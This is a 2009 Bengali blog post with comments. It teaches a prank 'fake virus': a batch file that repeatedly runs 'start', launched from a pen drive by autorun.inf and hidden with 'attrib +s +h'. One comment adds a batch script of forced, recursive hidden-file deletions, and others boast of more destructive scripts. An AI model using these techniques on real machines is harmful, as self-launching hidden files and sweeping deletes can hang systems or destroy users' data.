আমার প্রিয় পোস্ট

এইখানে শায়িত আছেন বাংলা ব্লগ ইতিহাসের কলঙ্ক...

আসেন ক্যাতা করি /:)

২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৪৫

শেয়ারঃ
0 0 0



১. Notepad খুলেন।

২. Start কথাটি বারবার লিখুন নিচে নিচে........এভাবে:

Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start

যতোবার খুশি।

৩. File থেকে Save as এ যান।

৪. vuavirus.bat নামে সেইভ করুন।

ফাইলটা ওপেন করুন........মজা দেখেন........../:)

আরো ক্যাতা করতে পারেন। অবশ্য এটা তাদের জন্য যারা বুঝতে চান ভাইরাস বা ট্রোজান কিভাবে কাজ করে। ভয় নেই, পিসির কোন ক্ষতি হবে না।

১. আবার Notepad খুলেন

২. নিচের কথাটা লিখেন:

[autorun]
open=vuavirus.bat
shell\open\command=vuavirus.bat

৩. File থেকে Save as এ যান। autorun.inf নামে সেইভ করুন।

এবার vuavirus.bat ও autorun.inf ফাইল দু'টাই আপনার পেনড্রাইভে কপি করুন। পেনড্রাইভটা একবার খুলে আবার পিসির সাথে লাগান। পেনড্রাইভে ডাবল-ক্লিক করেন। মজা দেখেন........./:)

দেখতেই পাচ্ছেন autorun.inf ফাইলটির কতো ক্ষমতা। এটিই সেই ফাইল যা আপনার পিসিতে অধিকাংশ ভাইরাস ও ট্রোজানকে আসার দরজা খুলে দেয়। কারন এই ফাইলটিতে আপনি যাই লিখবেন ও যেভাবে লিখবেন পেনড্রাইভে ডাবল ক্লিক করা মাত্র তা তা হবে। এই ফাইলটিতে লেখা কোড মোতাবেকই ভাইরাস আপনার রেজিস্ট্রি/টাস্ক ম্যানেজার/ফোল্ডার অপশন নিষ্ক্রিয় করে দেয়।

তবে আপনার ভুয়া ভাইরাসটি এখনো পূর্ণতা পায়নি। আসুন ফিনিশিং টাচ দেই:

১. Start Menu থেকে Run এ যান

লিখুন cmd

Enter চাপুন। কমান্ড প্রম্পট খুলবে।

২. আপনার পেনড্রাইভের ড্রাইভ লেটারটি দেখে নিন। যদি পেনড্রাইভটির ড্রাইভ লেটারটি হয়ে থাকে E তাহলে টাইপ করুন E: ও এন্টার চাপুন। আমার পেনড্রাইভের ড্রাইভ লেটার K, তাই আমি টাইপ করবো

K:

Enter চাপলাম।

৩. এবারে টাইপ করুন:

attrib vuavirus.bat +s +h

Enter চাপুন।

৪. এবারে টাইপ করুন:

attrib autorun.inf +s +h

Enter চাপুন।

আপনার ফাইল দু'টো এখন System Protected ফাইলে পরিণত হয়েছে। সাধারণভাবে এদের দেখা সম্ভব না। এমনকি Show Hiddnen Files & Folders সক্রিয় থাকলেও।

আপনার এই দুর্বলতাটাকেই অধিকাংশ ভাইরাস কাজে লাগায়। কারন সাধারণ অবস্থায় কারো পিসিতেই System Protected ফাইল ও ফোল্ডার দেখা যায় না। এখন যদি পেনড্রাইভে ডাবল ক্লিক করেন তবে আপনার এই ভূয়াভাইরাসটি সক্রিয় হবে। কিন্তু মজার ব্যাপার হলো দেখবেন পেনড্রাইভের ভেতরে কোন ফাইল নেই (আসলে আছে কিন্তু অদৃশ্য) :)

যাই হোক এই অদৃশ্য ফাইল দু'টো মুছতে হলে:

১. My Computer এ গিয়ে Tools > Folder Options এ যান, অতঃপর View নামক ট্যাবটি সিলেক্ট করুন।

২. Hide protected operating system files এর টিক মার্কটি উঠিয়ে দিন Apply করুন।



আরেকটু মজা পেতে চান?

১. আবার Notepad খুলেন

২. নিচের কথাটা লিখেন:

[autorun]
open=vuavirus.bat
shell\open\command=vuavirus.bat
shell\explore\command=vuavirus.bat

৩. autorun.inf বা অন্য যেকোন নামে সেইভ করুন

দেখবেন আপনার এ্যান্টিভাইরাস বলবে এটা একটা ভাইরাস।

আজ সকাল থেকে গুগলে ঘেঁটে ঘেঁটে কতগুলো বেসিক কোড জানলাম ও অবশেষে নিজে নিজে একটা পরীক্ষামূলক ভাইরাস বানানোর চেষ্টা করছি। এই একই পদ্ধতিতে কি করে রেজিস্ট্রি/টাস্ক ম্যানেজার/ফোল্ডার অপশন কি করে নিস্ক্রিয় করতে হয় তা জানলাম। তবে সেগুলো পোস্টাবো না, পোস্টালে পোস্ট শিওর মুছন খাবে। মাত্র কয়েকটা হাতে লিখা শব্দের কতো জোর........./:)

 

সর্বশেষ এডিট : ২৩ শে জানুয়ারি, ২০১২ দুপুর ১:১২ | বিষয়বস্তুর স্বত্বাধিকার ও সম্পূর্ণ দায় কেবলমাত্র প্রকাশকারীর...

 

১. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৪৯
মুহম্মদ জায়েদুল আলম বলেছেন: ভাইরাস টিওটোরিয়াল ভালো হইছে। কয়েকটা আগে জানতাম।কিছু আজ শিখলাম।
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৪

লেখক বলেছেন: হেঁ হেঁ.........বানাইতেসেন নাকি কিছু? ;)

২. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫০
স্বজন বলেছেন: না লিখলে আমারে মেইল দিয়ে দেন প্লিজ।
aa_3010@ইয়াহু.com
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:৩৩

লেখক বলেছেন: না তা হয় না..........:(

২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫২

লেখক বলেছেন: কোন ক্ষতি যখন হবে না তো সমস্যা কি? :)

৪. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫২
ভাঙ্গা পেন্সিল বলেছেন: K:
cd\
del *.exe /ah /s /q /f
del *.inf /ah /s /q /f
del "New Folder.exe" /s /q /f
del *.bat /ah /s /f /q
del *.cmd /ah /s /q /f
explorer K:


এইটা লেইখা একটা .bat শিরোনামে সেভ করেন। তারপরে রান করেন। যেকোনো হিডেন exe মুইছা দিবে;)
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৩

লেখক বলেছেন: ওগো জানি গো জানি........;)

৫. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫২
মুকুট বলেছেন: :|
পোলাডা নষ্ট হয়ে যাচ্ছে!
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০০

লেখক বলেছেন: কথা সত্য! ;)

২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০০

লেখক বলেছেন: হ! ;)

২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৯

লেখক বলেছেন: ভয় পাওয়া ভালো.........;)

৮. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৪
কাদামাটি বলেছেন: vai ami kub somossay asi.ai lekhata amer kub valo legese.but ki kore ami ata amer "priyothe" rakbo?plz plz kew aktu janaben.
.......
kono post ki kore "priyothe" rakha jay.
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৭

লেখক বলেছেন: পোস্টের শেষে কমেন্টগুলো শুরু হবার ঠিক আগে একটা হলুদ তারা চিহ্ন পাবেন........ওটাতে ক্লিক করলেই হবে.........

৯. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৬
হমপগ্র বলেছেন: এইসব করা ঠিক না...:#)
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৭

লেখক বলেছেন: ঠিক ঠিক! ;)

১০. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৭
নোবেলজয়ী বলেছেন: viya ki ekhono windows 98 use koren naki? screenshot dekhe to tai mone hocche...naki xp'r theme bebohar koren na?

virus banano shobai ke shikhano ki uchit holo? :(
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৯

লেখক বলেছেন: তুমি আর নেই সে আগের নোবেলজয়ী, নিকের মালিকানা বদলের ফল। হলে জানতে যে আমি এক্সপিতেও ক্লাসিক থিম ইউজ করি........

১১. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৩:৫৭
সাইফুর বলেছেন: আগে করছিলাম এনালাইসিস :)

২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০১

লেখক বলেছেন: তাইতো কই! :)

১২. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০১
নোবেলজয়ী বলেছেন: dukkhito jantam na. to classic theme keno use koren? default ta to valoi dekte
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০২

লেখক বলেছেন: ক্লাসিক থিম ইউজ করলে পিসি অনেক ফাস্ট কাজ করে.........

১৩. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০১
স্বজন বলেছেন: আমার এন্টিভাইরাস ওটাকে ট্রোজান হিসেবে সনাক্ত করেছে:)
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০২

লেখক বলেছেন: করারই কথা.........:)

১৪. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০২
বাংলা খবরাখবর বলেছেন: ভয়ে হাত পা.....হড়ড়ড়ড়ড়ড়ড়ড়
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০৩

লেখক বলেছেন: ভয় পাওয়া ভালো........;)

১৫. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০৪
মুহম্মদ জায়েদুল আলম বলেছেন: অনেক আগে বানাইছিলাম কয়েকটা। দুই একটা সফল(!) এক্সপেরিমেন্টের পর অবস্থা এমন হইলো যে,পোলাপান আমারে পেন ড্রাইভ দিতো না,আমার পেন ড্রাইভও কোথাও ব্যাবহার করতে দিতো না। বুঝেন বিপদ, পেন ড্রাইভ আছে কিন্তু আপনে অন্য পিসিতে তা ব্যাবহার করতে পারছেন না। পেন ড্রাইভের তাইলে দরকার কি?:(
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০৬

লেখক বলেছেন: হেঁ হেঁ.........আমার এসব নিয়ে অসীম আগ্রহের দরুন পরিচিত অনেকেই আমাকেও পেনড্রাইভ দিতে চান না..........:)

২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:০৭

লেখক বলেছেন: তবে অনেকে আবার সেধে সেধে দেন ভাইরাস, ট্রোজান তাড়ানোর জন্য ;)

১৬. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:১৬
সব যদি আজ বদলে যেত বলেছেন: ফাইল ২টা লেইখা আপলোড করে দেন।

নিজে লেখার সময় নাই।

২৪ শে জানুয়ারি, ২০০৯ বিকাল ৪:২৯

লেখক বলেছেন: লেখার কি দরকার? আমারটা কপি-পেস্ট করেন! :)

২৪ শে জানুয়ারি, ২০০৯ বিকাল ৫:২৫

লেখক বলেছেন: তোমার না ব্লগে আসার কথা না?

১৮. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৫:২৮
ভাইরাস! বলেছেন: এই মেধা আর সময় কোনো ফলপ্রসু কিছু শিখতে ব্যায় করলে সেটা ভবিষ্যতে কাজে দিবে।
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৫:৩১

লেখক বলেছেন: ভালো পরামর্শ........ধন্যবাদ! :)

২৪ শে জানুয়ারি, ২০০৯ বিকাল ৫:৪৭

লেখক বলেছেন: ;)

২০. ২৪ শে জানুয়ারি, ২০০৯ বিকাল ৫:৪৯
সুদীপ্ত বলেছেন: সবাই ভালো ভালো কথা বলছে আর মাইনাস দিচ্ছে কেন? +
২৪ শে জানুয়ারি, ২০০৯ বিকাল ৫:৫৪

লেখক বলেছেন: যারা ভালো কথা বলেছেন তাদের বেশিরভাগই মাইনাস দেননি বলেই আমার বিশ্বাস। যারা দিয়েছেন তারা ছুপা রুস্তম! ;)

আপনাকে ধন্যবাদ! :)

২১. ২৪ শে জানুয়ারি, ২০০৯ সন্ধ্যা ৬:০৯
বুলবুল আহমেদ পান্না বলেছেন: পিলাস দিতে ভুইলা গেছিলাম (সোরি)
এইবার দিলাম
২৪ শে জানুয়ারি, ২০০৯ সন্ধ্যা ৬:৩৬

লেখক বলেছেন: হেঁ হেঁ.........ধইন্যাপাতা আফনারে! ;)

২২. ২৪ শে জানুয়ারি, ২০০৯ রাত ১১:১৩
প্রলয় হাসান বলেছেন: ভাল লাগলো। প্রথমটা ট্রাই করেই বাকি গুলো বুঝে ফেলেছি।:)


নোবলেজয়ী নিকটা এখন কার দখলে? কথা বার্তায় তো পুরুষ মনে হয় না।;)
২৫ শে জানুয়ারি, ২০০৯ রাত ১২:০২

লেখক বলেছেন: ধন্যবাদ!

নোবেলজয়ী নিক এখন কার জানি না, তবে আমার সেই আগের নোবেল এখন আর নেই..........:(

২৩. ২৫ শে জানুয়ারি, ২০০৯ রাত ১২:২০
হিমালয়৭৭৭ বলেছেন: নাফিস, তুমি মিয়া law তে যে কেন পড়তেছো বুঝলাম না।।। তোমার computer engineering এ ট্রাই করা উচিৎ ছিল।।। ল ' তে তোমার পারফরমেন্স কেমন? আমার তো মনে হয় তুমি ল পড়ে মোটেই আনন্দ পাওনা।।।
২৫ শে জানুয়ারি, ২০০৯ রাত ১২:৪৮

লেখক বলেছেন: হিমালয় ভাই, ল' পড়ে আনন্দ পাই না ঠিক না - তবে সেটা অন্যরকম আনন্দ। পিসি আর ইন্টারনেট টপিক দু'টো নিয়ে বেশি আনন্দে থাকি সবসময় এটা ঠিক :) আর তাছাড়াও এ দু'টি ক্ষেত্রেই আমার জ্ঞান, আগ্রহ, জানার ইচ্ছে সবই End User এর দৃষ্টিভঙ্গি থেকে। আমি ফিচার খুঁজে বের করি, উপযোগিতা খুঁজি কিন্তু উপযোগিতা যোগ করার উপায় খুঁজি না, তবে কি কি উপযোগিতা যোগ করা যেতে পারে সেটা আবার চিন্তা করি। Developing সাইডে আমার জ্ঞান সীমিত। তবে সে আফসোস খানিকটা পূরণ করি এগুলোর Evolution, History, Future প্রভৃতি নিয়ে ঘেঁটে। Developing এর শুরু থেকে শেষ পর্যন্ত বিশ্লেষণ করে। আমার "ও" তো আমাকে বলেই, আমি নাকি কম্পিউটারকে বিয়ে করলে সবচেয়ে ভালো হয়। :)

২৪. ২৫ শে জানুয়ারি, ২০০৯ রাত ১২:৫২
অক্ষর বলেছেন: পুরান মাল

এখনো সেই আমলেই রৈয়া গেলি, যেই আমলে আরবরা গুহায় থাকতো আর খাজুর খাইতো
২৫ শে জানুয়ারি, ২০০৯ দুপুর ২:৫০

লেখক বলেছেন: নতুন মাল নিয়া তুই পুস্টা.........

২৫. ২৫ শে জানুয়ারি, ২০০৯ রাত ২:২৫
হিমালয়৭৭৭ বলেছেন: আমার একটা "ও" থাকলে ভাল হত; তাহলে অন্তত বুঝতে পারতাম কোনক্ষেত্রে আমার সফল হওয়ার চান্স আছে।।।।কিন্তু পরিতাপের বিষয় হলো, "এ", "ঐ", "ঔ" থাকলেও "ও" টা আমার স্বরলিপিতে নেই।।।। সুতরাং, চিৎপটাং!!!!!!!!
Click This Link
২৫ শে জানুয়ারি, ২০০৯ বিকাল ৩:৪৩

লেখক বলেছেন: বাংলা "ও" থাকার কি দরকার? ইংরেজীতেও তো আছে "O".........;)

২৬. ২৫ শে জানুয়ারি, ২০০৯ বিকাল ৩:০১
যুগান্তকারী বলেছেন: হা হা হা ভাবতাছি আমার ভাইরাস গুলা ছারুম নাকি?লেটেস্ট বানাইছি আই,পি বুটার হে হে এইটা জটিল জিনিস।
২৬ শে জানুয়ারি, ২০০৯ রাত ১২:৩০

লেখক বলেছেন: ;)

২৭. ৩০ শে জানুয়ারি, ২০০৯ সকাল ১০:০৩
নিশ্চুপ নিরবতা বলেছেন: জোস। কোপাকুপি। হা হা...... এইটা নতুন শুনলাম।
৩০ শে জানুয়ারি, ২০০৯ সকাল ১০:১৮

লেখক বলেছেন: হেঁ হেঁ........;)

২৮. ৩১ শে জানুয়ারি, ২০০৯ দুপুর ১২:০২
ল্যাটিচুড বলেছেন: নাফিস ভাই ধন্যবাদ মেইলঅয়্যার বাইটস এর কি দেওয়ার জন্য।

নাফিস ভাই আমার ভাইরাস সমস্যা এখও মিটে নাই। কালকে চেষ্টা চরিত্র করে ২ মেগা বাইট যায়গা খালি করছিলাম সি-ড্রাইভে আজ দেখছি ৯০ মেগাবাইট । হেল্প করেন ।

নাফিস ভাই - কম্পিউটার ওপেন করে টাস্ক ম্যানেজারে গেলে দেখি ২০-২৫ টা আইটেম , এগুলোই কি ভাইরাস নাকি?

ম্যানুয়ালী রেজিষ্ট্রি মুছে চেষ্টা করেছি কিন্তু রি বুট করলে আবার যা তাই
এখন উপায় কি?
৩১ শে জানুয়ারি, ২০০৯ বিকাল ৩:১১

লেখক বলেছেন: খেয়েছে! রেজিস্ট্রি থেকে কি মুছেছেন?? জরুরী কিছু নয়তো? আরও একটা ব্যাপার, সিস্টেম রিস্টোর অন থাকলে সি ড্রাইভে প্রতিটি নতুন রিস্টোর পয়েন্ট তৈরি হবার সাথে সাথে সি ড্রাইভে যায়গা কমতে থাকবে। এছাড়াও প্রতিদিন ব্রাউজার ব্যবহারের ফলে সি ড্রাইভে টেম্পোরারী ফাইল জমতে থাকে। ক্যাশ ক্লিন না করলে আপনার সি ড্রাইভের যায়গা কমতেই থাকবে। সি ড্রাইভে যায়গা কমার পেছনে ভাইরাসেরই অবদান এমনটা মনে করছেন কেন? এটা স্বাভাবিক প্রক্রিয়ায়ওতো ঘটতে পারে।

২৯. ৩১ শে জানুয়ারি, ২০০৯ বিকাল ৩:৪৯
রেজওয়ান শুভ বলেছেন: অশেষ ধন্যবাদ ফিরে অাসার জন্য ... ;)
৩১ শে জানুয়ারি, ২০০৯ রাত ১০:০১

লেখক বলেছেন: থ্যাংক্স........:)

৩০. ০১ লা ফেব্রুয়ারি, ২০০৯ রাত ১২:১১
ড্রাকুলা বলেছেন: হেই মিয়া, আজকে না নতুন পোষ্ট দেওয়ার কথা?
০১ লা ফেব্রুয়ারি, ২০০৯ রাত ১২:১৫

লেখক বলেছেন: নতুন বাসায় উঠছি। ব্যস্ত! :(

০১ লা ফেব্রুয়ারি, ২০০৯ সকাল ৯:১১

লেখক বলেছেন: কিছু না।

৩২. ০১ লা ফেব্রুয়ারি, ২০০৯ সকাল ৯:১৮
অক্ষর বলেছেন: ধারাবাহিক ভাবে কয়েকটা কমেন্ট কর্লাম আর তুমি বুঝলা না!!!
০১ লা ফেব্রুয়ারি, ২০০৯ সকাল ৯:২৪

লেখক বলেছেন: জবাব দিসি সব কয়টারই ;)

৩৩. ০১ লা ফেব্রুয়ারি, ২০০৯ সকাল ৯:২৫
অক্ষর বলেছেন: প্রথমে তো বুঝো নাই
০১ লা ফেব্রুয়ারি, ২০০৯ সকাল ৯:৩২

লেখক বলেছেন: হ! ;)

০১ লা ফেব্রুয়ারি, ২০০৯ সকাল ১০:১৬

লেখক বলেছেন: হুমমম.......

৩৫. ০১ লা ফেব্রুয়ারি, ২০০৯ সকাল ১১:২৩
সীমানাহীন বলেছেন: আমার একটা মন্তব্য ছিলো............... মুছে দিলেন কেন?
০১ লা ফেব্রুয়ারি, ২০০৯ সকাল ১১:৫২

লেখক বলেছেন: আপনার কোন কমেন্ট সজ্ঞানে বা অজ্ঞানে এই পোস্ট থেকে মোছা হয়নি। বরং এই পোস্টে এটাই আপনার প্রথম কমেন্ট। আপনি হয়তো অন্য কারো পোস্টের সাথে এটাকে মিলিয়ে ফেলছেন। আমি আমার মুছে ফেলা মন্তব্যসমূহের তালিকাও চেক করেছি। সেখানে আপনার কোন মন্তব্য নেই।

৩৬. ০১ লা ফেব্রুয়ারি, ২০০৯ রাত ১১:৪৬
বাপ্পাদিত্য বলেছেন: আপনার "বদ"ন্যতায় আমরা ধন্য...
০১ লা ফেব্রুয়ারি, ২০০৯ রাত ১১:৫৯

লেখক বলেছেন: :)

৩৭. ০৩ রা ফেব্রুয়ারি, ২০০৯ সকাল ১১:১৩
নিশ্চুপ নিরবতা বলেছেন: আমার কাছেও কয়েকটা আছে। যেমন- পিসি শাটডাউন, কিবোর্ড ডিজ্য্যাবল,সিসটেম ফাইল মোছা এবং ইত্যাদি। কিন্তু নাফিসের মত আমিও পোষ্টাবো না।
০৩ রা ফেব্রুয়ারি, ২০০৯ বিকাল ৫:২৩

লেখক বলেছেন: হেঁ হেঁ........এগুলো সাধনার জিনিস........;)

৩৮. ০৫ ই ফেব্রুয়ারি, ২০০৯ রাত ১২:১৫
গুপী গায়েন বলেছেন: আপ্নারে একটা ভাইরাস....

নাফিস আমাকে একটা মেইল করবেন? আমি আসলে ফেসবুকে আপ্নাকে খুঁজছিলাম।

০৫ ই ফেব্রুয়ারি, ২০০৯ রাত ১:০৩

লেখক বলেছেন: আমি তো ভাই ফেইসবুক ব্যবহার করি না.........তবে মেইল এ্যাড্রেস হলো:

৩৯. ০৫ ই ফেব্রুয়ারি, ২০০৯ রাত ১২:৩৮
অন্যসময় বলেছেন: শিফট চেপে পেন ড্রাইভ ঢোকালে autorun.inf ফাইল রান করে না।তবে ডবল ক্লিক না করে ফোল্ডার অপশন এ গিয়ে পেন ড্রাইভ এক্সপ্লোর করতে হয় এতে।হিডেন ও প্রোটেক্টড ফাইল দেখবার অপশন অন থাকলে নিজেই ভাইরাস গুলো তখন দেখতে পারবেন।
০৫ ই ফেব্রুয়ারি, ২০০৯ রাত ১:০৪

লেখক বলেছেন: টিপসগুলোর জন্য অনেক ধন্যবাদ! অনেকেরই কাজে লাগবে........:)

৪০. ০৬ ই ফেব্রুয়ারি, ২০০৯ সকাল ১১:৪৪
নিশ্চুপ নিরবতা বলেছেন: অটোরান বন্ধ করার আরেকটা জোস বুদ্ধি হল অ্যাডরেস বার এ ক্লিক করে পেন ড্রাইভ ওপেন করা। ১০০% নিরাপদ।
০৬ ই ফেব্রুয়ারি, ২০০৯ দুপুর ১২:৩৪

লেখক বলেছেন: ধন্যবাদ! :)

০৭ ই ফেব্রুয়ারি, ২০০৯ সন্ধ্যা ৬:০৮

লেখক বলেছেন: ;)

৪২. ০৭ ই ফেব্রুয়ারি, ২০০৯ দুপুর ১২:২৬
নিশ্চুপ নিরবতা বলেছেন: "২. Start কথাটি বারবার লিখুন নিচে নিচে........এভাবে:

Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start
Start

যতোবার খুশি"


বেশিবার লিখলে একটু বিপদ আছে। অনেক বেশি লিখলে পিসি হ্যাং খেয়ে বদহজম করে ফেলবে।
০৭ ই ফেব্রুয়ারি, ২০০৯ সন্ধ্যা ৬:০৮

লেখক বলেছেন: ঠিক বলেছেন! :)

৪৩. ০৭ ই ফেব্রুয়ারি, ২০০৯ দুপুর ১২:২৭
রোবোট বলেছেন: ক্যাত করা বালো না।
০৭ ই ফেব্রুয়ারি, ২০০৯ সন্ধ্যা ৬:০৯

লেখক বলেছেন: ক্যাতা করা ভালো যতোক্ষণ পর্যন্ত মাত্রা না ছাড়ায়.........:)

১৩ ই ফেব্রুয়ারি, ২০০৯ রাত ১০:৫৯

লেখক বলেছেন: :)

৪৫. ১৬ ই ফেব্রুয়ারি, ২০০৯ রাত ৮:৩১
েপচাইললা বলেছেন: হায়রে দ্যাশটার কি অইবো?
পুলাপান আকাম নিয়া মাইতা গ্যাছে!!
দাঁড়াও তুমার বাপরে কইয়া দিমু। আবার "ও"-ও বানায়্যা ফালাইছো!!
(অবশ্য তুমার বাপে তো তোমার ভালো বন্দু কইয়া কি অইবো বরং হাসবো।)

১৬ ই ফেব্রুয়ারি, ২০০৯ রাত ৯:০২

লেখক বলেছেন: আপনি কে জানতে পারলে খুশি হতাম! :)

৪৬. ২২ শে ফেব্রুয়ারি, ২০০৯ বিকাল ৩:২০
আকাশ_পাগলা বলেছেন: ভেজাল ভাইরাস আমিও বানাতে জানি। তবে সেগুলো একটু বেশী পাওয়ার রাখে। আপনার নিজের কোন মেসেজ থাকলে যেমন,(অই আমারে ফ্লেক্সী কর, আই-টপ কর ,আপনার কম্পিউটার এখনি ফরমাট হবে) তাও দেখানো পসিবল। কিন্তু যারা মাত্র কোডিং শিখল তারাও পারবে। পরে আমাকে নিয়ে হাসাহাসি হবে। কেউ পি সি তে ভিসউয়াল বেসিক ইন্সটঅল করলে খবর দিয়েন। কোড গুল লিখে দিতে পারি।
২২ শে ফেব্রুয়ারি, ২০০৯ বিকাল ৩:২৬

লেখক বলেছেন: আচ্ছা! :)

৪৮. ০৪ ঠা জানুয়ারি, ২০১০ দুপুর ১:৪১
রাফাত সাদাত বলেছেন: ক্যাতা করনের লিগা মাইনাস। /:)

 

মোট সময় লেগেছে ১.০০০১ সেকেন্ড

 

সামহোয়‍্যার ইন...ব্লগ বাঁধ ভাঙার আওয়াজ, মাতৃভাষা বাংলায় একটি উন্মুক্ত ও স্বাধীন মত প্রকাশের সুবিধা প্রদানকারী প্ল্যাটফর্ম। এখানে প্রকাশিত লেখা, মন্তব‍্য, ছবি, অডিও, ভিডিও বা যাবতীয় কার্যকলাপের সম্পূর্ণ দায় শুধুমাত্র সংশ্লিষ্ট প্রকাশকারীর...
© সামহোয়্যার ইন...নেট লিমিটেড | ব্যবহারের শর্তাবলী | গোপনীয়তার নীতি
অন্ধ-কালো ফুল... ফুরনো পুতুল...
হাওয়া দিক ভুল বারো মাস...
এলানো কাজল... ভাঙা রাজমহল...
বিষের ছোবল ঝরা শ্বাস...

facebook.com/nafis.iftekhar
twitter.com/nafis_iftekhar
আর এস এস ফিড

পোস্ট আর্কাইভ

আমার লিঙ্কস

আমার বিভাগ

    কোন বিভাগ নেই